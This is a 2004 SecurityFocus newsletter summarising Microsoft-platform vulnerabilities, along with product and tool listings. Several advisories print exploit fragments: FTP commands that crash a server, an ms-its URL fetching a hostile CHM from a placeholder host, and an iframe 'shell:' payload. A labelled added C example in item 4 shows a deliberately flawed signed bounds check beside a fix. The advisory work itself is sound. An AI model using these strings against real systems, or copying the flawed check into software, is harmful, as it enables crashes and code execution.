Focus on Microsoft
SecurityFocus Microsoft Newsletter #177 Feb 25 2004 03:43AM
Marc Fossi (mfossi securityfocus com)
SecurityFocus Microsoft Newsletter #177
----------------------------------------

I. FRONT AND CENTER
1. Automating Windows Patch Mngt: Part II
2. Knock, Knock, Knock
II. MICROSOFT VULNERABILITY SUMMARY
1. Sami FTP Server Multiple Denial Of Service Vulnerabilities
2. Microsoft Internet Explorer Unspecified CHM File Processing ...
3. Microsoft IIS Unspecified Remote Denial Of Service Vulnerabi...
4. Microsoft Internet Explorer Bitmap Processing Integer Overfl...
5. EarlyImpact ProductCart Multiple Vulnerabilities
6. RobotFTP Server Username Buffer Overflow Vulnerability
7. Microsoft Outlook Express Arbitrary Program Execution Vulner...
8. YABB SE Quote Parameter SQL Injection Vulnerability
9. RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulne...
10. YaBB Information Leakage Weakness
11. Ipswitch IMail Server Remote LDAP Daemon Buffer Overflow Vul...
12. Microsoft Windows XP Help And Support Center Interface Spoof...
13. WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulne...
14. Microsoft Windows NtSystemDebugControl() Kernel API Function...
15. Zone Labs ZoneAlarm SMTP Remote Buffer Overflow Vulnerabilit...
16. AOL Instant Messenger Buddy Icon Predictable File Location W...
III. MICROSOFT FOCUS LIST SUMMARY
1. Controlling Admin Access (Thread)
2. Preventing OS Detection (Thread)
3. SecurityFocus Microsoft Newsletter #176 (Thread)
4. PPTP versus L2TP and possible attacks (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Norton Internet Security 2004
2. Dekart Logon
3. AppSentry
4. AppDefend
5. Airscanner Mobile AntiVirus Pro
6. Symantec's Norton Internet Security 2004 Professional
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. GeneSyS v1.0
2. aNTG v2.1
3. Stunnel v4.05
4. Airscanner Mobile AntiVirus Pro v2.5
5. FileWatch v1.0
6. Enigmail v0.83.2
VI. UNSUBSCRIBE INSTRUCTIONS

I. FRONT AND CENTER
-------------------
1. Automating Windows Patch Mngt: Part II
By Jonathan Hassell

In this segment of the Windows Patch Management series, you'll learn what
happens on the client computers when SUS is active, how to monitor the
client's patching activities, and how to fix or work around some common
problems.

http://www.securityfocus.com/infocus/1762

2. Knock, Knock, Knock
By Kelly Martin

If hundreds of thousands of people are still blindly clicking on
attachments in their email, is there any hope of mitigating the threat of
hundreds of thousands of compromised systems with open backdoors?

http://www.securityfocus.com/columnists/221

II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. Sami FTP Server Multiple Denial Of Service Vulnerabilities
BugTraq ID: 9657
Remote: Yes
Date Published: Feb 13 2004
Relevant URL: http://www.securityfocus.com/bid/9657
Summary:
Sami FTP Server is an FTP server solution for Microsoft Windows platforms.

Sami FTP Server has been reported prone to multiple remote denial of
service vulnerabilities. It has been reported that an attacker who has
sufficient credentials to access a vulnerable server, may cause the
pmsystem.exe executable to raise a fatal exception by making unexpected
FTP requests.

The following requests will trigger an exception in the affected server,
causing the software to fail.
    cd ~
    cd /../
    get %Filename that does not exist%
    ftp://user:pass@ftp.example.com////

A remote attacker may exploit these vulnerabilities to deny service to
legitimate users of the FTP server.

2. Microsoft Internet Explorer Unspecified CHM File Processing ...
BugTraq ID: 9658
Remote: Yes
Date Published: Feb 13 2004
Relevant URL: http://www.securityfocus.com/bid/9658
Summary:
Microsoft Internet Explorer has been reported prone to an unspecified
vulnerability when handling CHM files. The issue is reportedly exploitable
to provide for automatic delivery and execution of an arbitrary
executable. This would occur when malicious web content is rendered in
Internet Explorer.

The issue is believed to be a variant of the vulnerabilities described in
BID 9107 (Microsoft Internet Explorer Browser MHTML Redirection Local File
Parsing Vulnerability) and BID 9105 (Microsoft Internet Explorer MHTML
Forced File Execution Vulnerability). In this case, however, MHTML
redirection occurs through the MS-ITS InfoTech Protocol. The
vulnerability is reportedly exploited with the following syntax:

ms-its:mhtml:file://C:\ss.MHT!http://www.yoursite.tld//chm.chm::/files/launch.htm

It is conjectured that this could be used to cause a hostile CHM file to
be executed in the context of the Local Zone on a client system.

It has been reported that this vulnerability is actively being exploited
as an infection vector for malicious code that has been temporarily dubbed
'Ibiza'.

According to new information, by employing a malformed CLSID parameter
this vulnerability may allow malicious applications to be downloaded
without user intervention.

3. Microsoft IIS Unspecified Remote Denial Of Service Vulnerabi...
BugTraq ID: 9660
Remote: Yes
Date Published: Feb 14 2004
Relevant URL: http://www.securityfocus.com/bid/9660
Summary:
Microsoft IIS is a web server implementation for Microsoft Windows
systems.

Microsoft IIS has been reported prone to a remote denial of service
vulnerability. It has been reported that an exploit developed as a
proof-of-concept for the issues described in BID 8732 (OpenSSL ASN.1
Parsing Vulnerabilities), when invoked against Microsoft IIS 5.0, will
trigger a denial of service. Specifically, when processing the exploit
data LSASS.EXE reportedly consumes system memory resources in an
exponential manner until it finally fails.

Although unconfirmed this issue may be related to the issues described in
BID 9633 (Microsoft ASN.1 Library Length Integer Mishandling Memory
Corruption Vulnerability) and BID 9635 (Microsoft Windows ASN.1 Library
Bit String Processing Integer Handling Vulnerability).

An attacker may potentially exploit this condition to deny HTTPS service
to legitimate users.

This issue is reported to affect Microsoft Windows 2000 Server (Korean
Release) + IIS 5.0; other versions might also be affected.

This BID will be updated as further analysis of this issue is completed.

4. Microsoft Internet Explorer Bitmap Processing Integer Overfl...
BugTraq ID: 9663
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9663
Summary:
Microsoft Internet Explorer has been reported prone to an integer overflow
vulnerability. The issue presents itself in bitmap file processing
procedures and is due to the use of a signed integer employed during
boundary checking routines.

An attacker may reportedly create a malicious bitmap that is crafted in a
manner to cause the affected integer to wrap to a negative value when the
malicious bitmap file is processed. When this integer is later used in a
procedure to read data into a 1024 byte buffer, the procedure may read
excessive data into the buffer invariably resulting in a stack buffer
overflow. Ultimately an attacker may exploit this condition to corrupt a
saved instruction or stack frame base pointer, to influence execution flow
of the affected browser into attacker-supplied instructions.

This vulnerability has been reported to affect Internet Explorer version
5; other versions may also be affected. Internet Explorer version 6 is
reported not to be vulnerable to this issue.

This issue could also be exposed via other software that uses Internet
Explorer to render images, such as Outlook, though this has not been
confirmed.
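
The signed bounds check described in item 4, shown beside a corrected form. This is an added example, not part of the original newsletter and not Internet Explorer's code: the length-prefixed layout, the field position and all function names are hypothetical, and only the 1024 byte buffer size comes from the summary. The flawed check only reports the size it would accept; the copy is performed only by the hardened reader.

```c
/* Added illustration: hypothetical layout and names, not Internet Explorer's code. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024   /* buffer size given in the summary; deliberately a signed int constant */

/* Read a little-endian 32-bit field from untrusted file bytes. */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hold the raw field in a signed variable, as the flawed pattern does. */
static int32_t as_signed(uint32_t raw)
{
    int32_t v;
    memcpy(&v, &raw, sizeof v);
    return v;
}

/*
 * Flawed pattern: signed length, upper bound only.
 * Returns 1 if the length is accepted and stores in *n the byte count a
 * later read would be asked for. No copy is performed here.
 */
int flawed_length_check(uint32_t raw_len, size_t *n)
{
    int32_t len = as_signed(raw_len);
    if (len > BUF_SIZE)          /* a negative len passes this test */
        return 0;
    *n = (size_t)len;            /* negative len converts to a huge size_t */
    return 1;
}

/*
 * Corrected check: compare as unsigned, and also bound the length by the
 * number of input bytes actually available.
 */
int checked_length(uint32_t raw_len, size_t avail, size_t *n)
{
    if (raw_len > (uint32_t)BUF_SIZE)
        return 0;                /* no value can be "negative" here */
    if (raw_len > avail)
        return 0;                /* never read past the end of the input */
    *n = (size_t)raw_len;
    return 1;
}

/*
 * Hardened reader for the hypothetical layout: a 4-byte length field
 * followed by that many payload bytes. out must hold BUF_SIZE bytes.
 * Returns the number of bytes copied, or -1 if the input is rejected.
 */
long read_block(const unsigned char *file, size_t file_len, unsigned char *out)
{
    size_t n;
    if (file_len < 4)
        return -1;
    if (!checked_length(le32(file), file_len - 4, &n))
        return -1;
    memcpy(out, file + 4, n);
    return (long)n;
}

/* Constructed sample inputs (not taken from any real file). */
static const unsigned char sample_ok[] =
    {0x08, 0x00, 0x00, 0x00, 'p', 'a', 'l', 'e', 't', 't', 'e', '!'};
static const unsigned char sample_wrapped[] =
    {0x00, 0xFF, 0xFF, 0xFF, 'x'};   /* length field 0xFFFFFF00 = -256 as int32 */

int main(void)
{
    unsigned char out[BUF_SIZE];
    size_t n = 0;
    int accepted = flawed_length_check(le32(sample_wrapped), &n);

    printf("flawed check:  accepted=%d, requested read size=%zu\n", accepted, n);
    printf("hardened read: %ld (wrapped length)\n",
           read_block(sample_wrapped, sizeof sample_wrapped, out));
    printf("hardened read: %ld (valid length)\n",
           read_block(sample_ok, sizeof sample_ok, out));
    return 0;
}
```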

5. EarlyImpact ProductCart Multiple Vulnerabilities
BugTraq ID: 9669
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9669
Summary:
EarlyImpact ProductCart is e-commerce software that is implemented in ASP
and available for Microsoft Windows systems.

EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities.
The specific issues include SQL injection, cross-site scripting and
cryptographic weaknesses. These issues could expose sensitive data such
as user credentials and allow for execution of hostile script code and
HTML. These issues could allow for full compromise of the software.

The following specific issues were reported:

A cryptographic weakness in the user credential encryption routines was
reported. In particular, the keystream used for the stream cipher is
prone to a chosen plaintext attack. Credentials are encrypted (and
decrypted) using a bitwise XOR operation with the keystream and the
plaintext or ciphertext (respective to whether the data is being encrypted
or decrypted). If the keystream can be determined, then it is trivial to
decrypt credentials for customers and administrators of the software. The
attacker would of course be required to have prior access to this data,
but this may be accomplished through exploitation of the SQL injection
vulnerability described below.

An SQL injection vulnerability has been reported in the advSearch_h.asp
script. Data supplied via URI parameters to this script will be used
directly in SQL queries without adequate input validation. This could
allow for various attacks, such as disclosing encrypted user credentials
(which could be decrypted via the previously mentioned cryptographic
weakness). Other attacks are also possible.

A cross-site scripting issue was reported in the Custva.asp script. Input
supplied to the 'redirectUrl' URI parameter will be included in
dynamically generated pages without adequate sanitization of HTML and
script code. An attacker could exploit this issue by embedding hostile
HTML and script code via this parameter in a malicious link. If an
unsuspecting user follows this link, the attacker-supplied code may be
rendered in the web browser in the security context of the site. This
could be exploited to steal cookie-based authentication credentials or to
mount other attacks.

6. RobotFTP Server Username Buffer Overflow Vulnerability
BugTraq ID: 9672
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9672
Summary:
RobotFTP Server is an FTP Server for Microsoft Windows operating systems.

A vulnerability has been reported for RobotFTP Server. The problem likely
occurs due to insufficient bounds checking when processing 'USER' command
arguments of excessive length.

By exploiting this issue to modify sensitive stack variables, an anonymous
remote attacker may be able to execute arbitrary code. This, however, has
not been confirmed. Failed exploit attempts may result in a denial of
service.

7. Microsoft Outlook Express Arbitrary Program Execution Vulner...
BugTraq ID: 9673
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9673
Summary:
Microsoft Outlook Express uses Internet Explorer to render HTML e-mail and
newsgroup messages by default. A vulnerability may exist in the software
that may allow a remote attacker to execute arbitrary applications on a
vulnerable system. This issue may be exploited by embedding an object in
an HTML e-mail. It may be possible for an attacker to place a file in a
known folder through other means and have it executed through this method.

Due to a lack of information, further details are not available at the
moment. This BID will be updated as more information becomes available.
This issue may be related to the vulnerability described as Microsoft
Outlook and Outlook Express Arbitrary Program Execution Vulnerability (BID
6923).

8. YABB SE Quote Parameter SQL Injection Vulnerability
BugTraq ID: 9674
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9674
Summary:
YaBB SE is a freely available, open source port of Yet Another Bulletin
Board (YaBB). It is available for Unix, Linux, and Microsoft Operating
Systems.

A vulnerability in YaBB SE could make it possible for a remote user to
launch SQL injection attacks.

It has been reported that the issue exists due to insufficient sanitizing
of the 'quote' URI parameter, which makes it possible for a remote user to
inject arbitrary SQL queries into the database used by YaBB SE. This could
permit remote attackers to pass malicious input to database queries,
resulting in modification of query logic or other attacks.

Successful exploitation could result in compromise of the YaBB SE,
disclosure or modification of data or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

The proof of concept supplied within the report allows an attacker to gain
access to users' password hashes.

YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this
issue; however, other versions could be affected as well.

9. RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulne...
BugTraq ID: 9675
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9675
Summary:
RhinoSoft Serv-U FTP Server is designed for use with Microsoft Windows
operating systems.

RhinoSoft Serv-U FTP Server has been reported prone to a remote
post-authentication buffer overflow vulnerability.

The vulnerability is reported to exist when a malicious filename argument
is passed to the SITE CHMOD command. It has been reported that excessive
data passed to the SITE CHMOD command in this manner, will overrun the
bounds of a reserved buffer in memory. This will ultimately result in the
two least significant bytes of a saved pointer value being corrupted with
attacker-supplied values.

An attacker may potentially exploit this condition to control the location
of write into a somewhat limited range of memory. The immediate
consequences of this may be a denial of service. Although unconfirmed it
may be possible for an attacker to leverage this condition to have
arbitrary code executed in the context of the affected service.

This issue is not dependent on write permission on the affected FTP
server.

10. YaBB Information Leakage Weakness
BugTraq ID: 9677
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9677
Summary:
YaBB (Yet Another Bulletin Board) is freely available web forum software
that is written in Perl. YaBB will run on most Unix/Linux variants, Mac
OS, and Microsoft Windows platforms.

YaBB is prone to a weakness that may permit remote users to enumerate
usernames. The cause of this issue is that YaBB returns different
responses based on whether or not a guessed username is valid or invalid
when the user attempts to log in. This information could aid in further
attacks.

It should be noted that this issue would only present a security risk on
installations that do not allow guests or anonymous web users to browse
the forum, in which case remote users would not be privy to usernames.
Otherwise this information would already be publicly accessible.

This issue was reported in YaBB 1 Gold - SP 1.3.1. Other versions may
also be affected.

11. Ipswitch IMail Server Remote LDAP Daemon Buffer Overflow Vul...
BugTraq ID: 9682
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9682
Summary:
Ipswitch IMail is an e-mail server that serves clients their mail via a
web interface. It runs on Microsoft Windows operating systems. IMail ships
with an LDAP daemon.

The Ipswitch LDAP daemon has been reported prone to a remote buffer
overflow vulnerability. The vulnerability exists due to a lack of
sufficient boundary checks performed on user supplied LDAP tags. When
attacker-supplied data containing large LDAP tags is processed by the
affected service, a stack based buffer overflow condition will be
triggered. An attacker may exploit this condition to control variables
that are used as an offset from the active stack frame pointer, in a write
operation as follows:
    mov byte ptr [ebp+ecx+var_4], dl

Because the location of the write is controlled, the remote attacker may
overwrite the Global Exception Handler to ultimately redirect the
execution flow of the affected service into attacker-supplied
instructions. The attacker's payload would be executed in the security
context of the affected service.

12. Microsoft Windows XP Help And Support Center Interface Spoof...
BugTraq ID: 9685
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9685
Summary:
A weakness has been alleged in Microsoft Windows XP that could reportedly
allow aspects of the Help and Support Center interface to be spoofed via a
malicious link. By spoofing this interface, an attacker could potentially
present misleading or hostile content to a user in a manner which may
cause the user to trust it. This weakness employs the connection.htm
error page to present attacker-specified web pages in the interface with
various misleading properties, such as an arbitrary title (Windows Update
is used in the example) and instructional text.

Symantec has not been able to reproduce this alleged weakness.

13. WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulne...
BugTraq ID: 9693
Remote: Yes
Date Published: Feb 18 2004
Relevant URL: http://www.securityfocus.com/bid/9693
Summary:
WebCortex WebStores2000 is shopping cart software implemented in ASP. It
is available for Microsoft Windows operating environments.

It has been reported that WebStores2000 is prone to a cross-site scripting
vulnerability. This issue is reportedly due to a failure to sanitize user
input and so allow HTML and script code that may facilitate cross-site
scripting attacks.

This issue is reported to affect the 'Message_id' parameter of the
'error.asp' script.

This could permit a remote attacker to create a malicious link to the
vulnerable application that includes hostile HTML and script code. If this
link were followed, the hostile code may be rendered in the web browser of
the victim user. This would occur in the security context of the web
server and may allow for theft of cookie-based authentication credentials,
session data, or other attacks.

14. Microsoft Windows NtSystemDebugControl() Kernel API Function...
BugTraq ID: 9694
Remote: No
Date Published: Feb 18 2004
Relevant URL: http://www.securityfocus.com/bid/9694
Summary:
It has been reported that security exposures exist in kernel API functions
for Microsoft Windows operating systems that may permit local privilege
escalation attacks.

The primary source of these issues is that the ZwSystemDebugControl()
function exports the NtSystemDebugControl() Windows system function, which
is executed in kernel mode (ring 0). This could allow for numerous
attacks which could permit users to gain elevated privileges by executing
code in kernel context or reading from and writing to any kernel address.

These issues were reported to exist in Microsoft Windows XP but it has
been conjectured that Microsoft Windows Server 2003 may also be affected
by these issues.

It should be noted that a local user would require the SeDebugPrivilege to
exploit these flaws.

These flaws are currently pending further analysis. While only believed
to be one core vulnerability at this point (with multiple attack vectors),
it is still possible that distinct issues will be identified. In this
case, this BID will be separated into multiple BIDs accordingly.

15. Zone Labs ZoneAlarm SMTP Remote Buffer Overflow Vulnerabilit...
BugTraq ID: 9696
Remote: Yes
Date Published: Feb 19 2004
Relevant URL: http://www.securityfocus.com/bid/9696
Summary:
ZoneAlarm is a firewall software package designed for Microsoft Windows
operating systems. It is distributed and maintained by Zone Labs.

A vulnerability has been identified in the software that may allow an
attacker to execute arbitrary code on a vulnerable system in order to gain
unauthorized access. The problem exists due to insufficient boundary
checking by the TrueVector Internet Monitor (vsmon.exe) process used by
various Zone Labs applications.

It has been reported that Zone Labs products process incoming and outgoing
SMTP traffic to perform various security related functions. The issue is
reportedly caused by an unchecked buffer in the Simple Mail Transfer
Protocol (SMTP) processing, therefore it presents itself remotely when the
target system is operating as an SMTP server on TCP port 25.
Specifically, the issue arises when an outgoing e-mail message is examined
and the destination e-mail address is retrieved. This vulnerability can
be exploited remotely, if an attacker is able to send an outgoing e-mail
message via the server. The attacker would send a message with an
excessively large string value in the destination e-mail address field.
By sending a large value via the destination e-mail address field to the
'RCPT TO' command argument, a stack based buffer may be overflowed in the
vsmon.exe process.

The issue may also be exploited locally to gain SYSTEM level privileges if
a malicious user on the system has been given permission to access the
network by an administrator or another user. An attacker may send a
malicious e-mail sufficient to trigger and exploit this issue. Immediate
consequences of an attack may result in a denial of service condition.

Successful exploitation of this issue may allow an attacker to cause the
firewall process to crash and/or execute arbitrary code in order to gain
SYSTEM level access.

ZoneAlarm family of products and Integrity client versions 4.0 and above
are reported to be prone to this issue. Integrity Server and Integrity
Clientless Security products are not affected by this issue.

16. AOL Instant Messenger Buddy Icon Predictable File Location W...
BugTraq ID: 9698
Remote: Yes
Date Published: Feb 19 2004
Relevant URL: http://www.securityfocus.com/bid/9698
Summary:
AOL Instant Messenger stores imported Buddy Icons in a predictable
location on client systems. Specifically, the files will be stored in the
following location on the local filesystem:

c:\documents and settings\username\application data\aim\bartcache\1

Other attacks are possible given the ability to store content on a system
in a predictable location, such as Microsoft Internet Explorer Shell:
IFrame Cross-Zone Scripting Vulnerability (BID 9628). The issue described
in BID 9628 may allow hostile script code to access properties of an
IFrame that has been opened in the context of the My Computer Zone.
Reportedly, if an IFrame opens up a local resource using a 'shell:' link,
it may be possible for the page that spawns the IFrame to access
properties of the My Computer Zone.

The issue could be exploited via a malicious web page created by the
attacker. The attacker would then create another page that includes code
such as:

<iframe src="shell:appdata\aim\bartcache\1\maliciousfile"></iframe>

By creating a hyperlink to the malicious page and sending it to a victim
in a buddy list running AOL Instant Messenger client, this issue could
potentially allow for remote compromise of the client system in the
context of the client user. Successful exploitation would require that
the victim exists on the attacker's buddy list.

This issue has been tested on AOL Instant Messenger versions 4.3 to 5.5,
however, it is possible that other versions are affected as well.

III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Controlling Admin Access (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/354798

2. Preventing OS Detection (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/354797

3. SecurityFocus Microsoft Newsletter #176 (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/354204

4. PPTP versus L2TP and possible attacks (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/354022

IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Norton Internet Security 2004
By: Symantec
Platforms: Windows 95/98
Relevant URL: http://www.symantec.com/sabu/nis/nis_pe/
Summary:

Symantec's Norton Internet Security 2004 provides essential protection
from viruses, hackers, and privacy threats. Powerful yet easy to use, this
award-winning suite now includes advanced spam-fighting software to filter
unwanted mail out of your inbox. Protect yourself, your family, and your
PC online with Norton Internet Security 2004.

2. Dekart Logon
By:
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.dekart.com/products/authentication_access/logon/
Summary:

Dekart Logon is a solution designed to provide an additional level of
security for the Microsoft Windows operating system. Access to the Windows
environment can only be gained after inserting a USB key or smart card
into the appropriate slot and by entering the correct PIN code.

Dekart Logon offers a number of security options: you can select to have
Windows access blocked once the key is removed, during a screen saver
timeout or other user assigned prompts. This flexibility automatically
reduces the possibility of human error by maintaining predefined security
levels even if the user leaves their PC unattended.

3. AppSentry
By: Integrigy
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.integrigy.com/appsentry.htm
Summary:

AppSentry is a new generation of security scanner and vulnerability
assessment tool. Unlike other security scanners, AppSentry knows the
application it is validating - its technology and data model. The security
audits and checks are written specifically for the application being
tested. Hackers and mischievous employees often exploit security issues at
different layers of the technology stack, thus only a complete and
comprehensive security validation will uncover all risks in a multi-tiered
environment.

The advantage of AppSentry is that you no longer need separate tools for the
operating system, web server, and database. AppSentry is a single tool
that can validate and audit the security of the entire application
technology stack from operating system to application layer.

AppSentry is available for the following applications -

Oracle E-Business Suite (11i)
Oracle Database (8.x, 8i, 9i, 10g)
Oracle Application Server (9iAS, 10g)
SAP
PeopleSoft
Microsoft SQL Server

4. AppDefend
By: Integrigy
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.integrigy.com/appdefend.htm
Summary:

AppDefend is a new concept in Intrusion Prevention - direct application
protection. AppDefend protects the application from attacks and intrusions
by blocking attacks before they reach the application.

AppDefend is designed specifically for the application it is protecting.
Thus, when implementing for the Oracle E-Business Suite, there is no
analysis or other configuration required to provide maximum protection for
the application. Integrigy has already performed all this work for you --
all modules, all versions.

AppDefend is designed to be simple to install and easy to maintain. A
straight-forward, yet robust, implementation takes only 15 minutes. No
complex configuration or analysis of the application is required.

5. Airscanner Mobile AntiVirus Pro
By: Airscanner Corp.
Platforms: Windows CE
Relevant URL: http://airscanner.com/downloads/av/av.html
Summary:

Airscanner Mobile AntiVirus Pro will quarantine or eradicate embedded
viruses and malware, has fast, optimized scanning speed based on patent
pending technology, has automatic, online updates of virus signatures and
scanning engine as well as support for PocketPC 2003/Windows Mobile 2003
and easy online updates.

In addition to an accurate virus scanner, Airscanner Mobile AntiVirus
includes these powerful tools for debugging Trojan horses:
- Intercept memory resident viruses with an advanced process discovery
tool.
- Debug Trojan hacks with an easy-to-use registry viewer.
- Uncover denial of service attacks with a rapid system analyzer.
- Enter your own custom virus signatures (for experts).
- Perform fast, recursive, and flexibly multithreaded filesystem
scanning.

6. Symantec's Norton Internet Security 2004 Professional
By: Symantec
Platforms: Windows 2000, Windows 95/98, Windows XP
Relevant URL: http://www.symantec.com/smallbiz/nis_pr/
Summary:

Symantec's Norton Internet Security 2004 Professional protects you and
your business from online threats. It eliminates viruses automatically,
blocks hackers, safeguards your personal information, fights spam,
increases online productivity, recovers lost or damaged files, and
thoroughly deletes confidential data you no longer need. Available in 5
and 10-user Small Office Packs.

V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. GeneSyS v1.0
By: Balazs E. Pataki
Relevant URL: http://genesys.sztaki.hu
Platforms: UNIX, Windows 2000, Windows NT
Summary:

GeneSyS aims to define and implement a middleware architecture for generic
system monitoring and supervision. It is an Information Society Project
(IST-2001-34162) sponsored by the European Commission. It provides a
middleware- and agent-based approach for system monitoring and management.
It uses WebServices technology (SOAP) for communication between components
and XML-based descriptions of monitoring information.

2. aNTG v2.1
By: Lucas
Relevant URL: http://www.thebobo.com/antg.php
Platforms: UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:

aNTG (another Network Traffic Grapher) is a PHP program that collects and
graphs network traffic statistics on a Linux machine.

3. Stunnel v4.05
By: Michal Trojnara, <Michal.Trojnara (at) mirt (dot) net>
Relevant URL: http://stunnel.mirt.net/
Platforms: FreeBSD, Linux, Windows 2000, Windows 95/98, Windows NT
Summary:

The stunnel program is designed to work as an SSL encryption wrapper
between remote client and local (inetd-startable) or remote server. It can
be used to add SSL functionality to commonly used inetd daemons like POP2,
POP3, and IMAP servers without any changes in the programs' code. It will
negotiate an SSL connection using the OpenSSL or SSLeay libraries. It
calls the underlying crypto libraries, so stunnel supports whatever
cryptographic algorithms you compiled into your crypto package.

4. Airscanner Mobile AntiVirus Pro v2.5
By: Airscanner Corp
Relevant URL: http://airscanner.com/downloads/av/av.html
Platforms: Windows CE
Summary:

Airscanner Corporation is the most trusted name in helping to defend your
mobile device from "airborne" computer viruses. From the company that
wrote the best-selling technical book Maximum Wireless Security comes a
professional strength virus scanner for the Pocket PC.

With the increased wireless connectivity of PDAs and Smartphones comes an
increased threat from virus attacks. Save money, time, and data by
protecting your valuable Pocket PC now with Airscanner Mobile AntiVirus
Pro.

5. FileWatch v1.0
By: robinkeir (at) foundstone (dot) com
Relevant URL: www.foundstone.com/rdlabs/tools.html
Platforms: Windows NT
Summary:

A file change monitor. Used with BlackICE Defender. FileWatch (originally
called ICEWatch 1.x) is a small utility that can monitor a given file for
changes. Monitoring can detect file size changes or simply file writes,
both with minimal impact on system resources (no polling is performed).
The primary use of this utility is for monitoring changes in the log file
of a personal firewall program and being able to spawn a separate
application when changes are detected, but the tool can be applied to any
number of other uses.

6. Enigmail v0.83.2
By: Patrick
Relevant URL: http://enigmail.mozdev.org/thunderbird.html
Platforms: Linux, MacOS, POSIX, UNIX, Windows 2000, Windows 3.x, Windows
95/98, Windows CE, Windows NT, Windows XP
Summary:

Enigmail is a "plugin" for the mail client of Mozilla and Netscape 7.x
which allows users to access the authentication and encryption features
provided by the popular GnuPG software. Enigmail can encrypt/sign mail
when sending, and can decrypt/authenticate received mail. It can also
import/export public keys. Enigmail supports both the inline PGP format
and the PGP/MIME format, which can be used to encrypt attachments.
Enigmail is cross-platform, although binaries are supplied only for a
limited number of platforms. Enigmail uses inter-process communication to
execute GPG to carry out encryption/authentication.

VI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to
ms-secnews-unsubscribe (at) securityfocus (dot) com from the subscribed address. The
contents of the subject or message body do not matter. You will receive a
confirmation request message to which you will have to answer.
Alternatively you can also visit http://www.securityfocus.com/newsletters
and unsubscribe via the website.

If your email address has changed, email listadmin (at) securityfocus (dot) com and
ask to be manually removed.

Copyright 2008, SecurityFocus